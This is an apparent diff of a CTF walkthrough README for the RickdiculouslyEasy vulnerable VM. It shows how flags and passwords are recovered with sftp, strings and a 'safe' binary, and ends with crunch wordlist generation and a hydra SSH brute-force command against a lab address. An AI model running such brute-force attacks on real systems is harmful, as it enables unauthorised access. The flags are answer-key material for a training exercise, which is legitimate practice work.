keerthiprabup/VM/RickdiculouslyEasy/readme.md

-pass:Meeseek
-zip:
+Using $cd command navigate to the home directory and to Morty,

+There we will be getting two files:

+        journal.txt.zip  Safe_Password.jpg
+Which can be get into your system using the sftp protocol

+command:

+        $sftp Summer@<ip> -p 22222
+Navigate to the file directory and then use $get command to transfer those files to your local system.

+After getting the files use the command:

+        $strings <filename>
+to get the string values hidden in the jpg file.

+we will get a string

+       8 The Safe Password: File: /home/Morty/journal.txt.zip.
+Password: Meeseek Where we got the pass for the zip file :Meeseek

+    Opening the zip using the password, we will get a message and a flag:
+    Monday: So today Rick told me huge secret.
+He had finished his flask and was on to commercial grade paint solvent.
+He spluttered something about a safe, and a password.
+Or maybe it was a safe password...
+Was a password that was safe?
+Or a password to a safe?
+Or a safe password to a safe?

+    Anyway.
+Here it is:

+    FLAG: {131333} - 20 Points
 ### 7.FLAG: {131333}

-safe flag:
+This flag seems interesting because it is different from other flags.

+Again going through the ssh server using the credentials of the user Summer we get a file named 'safe' inside the dir

+      /home/RickSanchez/RICKS_SAFE/
+Opening the safe with the command

+    $./safe
+result in permission error.

+So we copy it to the Summer's home directory and open it using the same command.

+Now it gives a hint:

+    Past Rick to present Rick, tell future Rick to use GOD DAMN COMMAND LINE AAAAAHHAHAGGGGRRGUMENTS!

+Try passing the argument we got from the last flag into the command like:

+    $./safe 131333
+We got the hint and the flag:

-### 8.FLAG{And Awwwaaaaayyyy we Go!}
+        decrypt:        FLAG{And Awwwaaaaayyyy we Go!} - 20 Points

-safe hint:

         Ricks password hints:
          (This is incase I forget..
 I just hope I don't forget how to write a script to generate potential passwords.
 Also, sudo is wheely good.)
         Follow these clues, in order

         1 uppercase character
         1 digit
-      One of the words in my old bands name.  ---> Flesh Curtains
+        One of the words in my old bands name.� @

+### 8.FLAG{And Awwwaaaaayyyy we Go!}

-crunch the password list
+Now we can crunch the password list

+Doing some little web surfing on the old band name of RickSanchez and Morty gets you the band name:Flesh Curtains

+Use the commands to crunch the password:

-crunch 7 7 ,%Flesh -O >>yourfile.txt
+    $crunch 7 7 ,%Flesh -O >>yourfile.txt
-crunch 10 10 ,%Curtains -O>>Yourfile.txt
+    $crunch 10 10 ,%Curtains -O>>Yourfile.txt

-bruteforce using hydra
+Bruteforce the password list on the ssh server using the username RickSanchez using $hydra command:

     $ hydra -l RickSanchez -P yourfile.txt 192.168.42.8 ssh  -s  22222
+The password is:

 flag root access: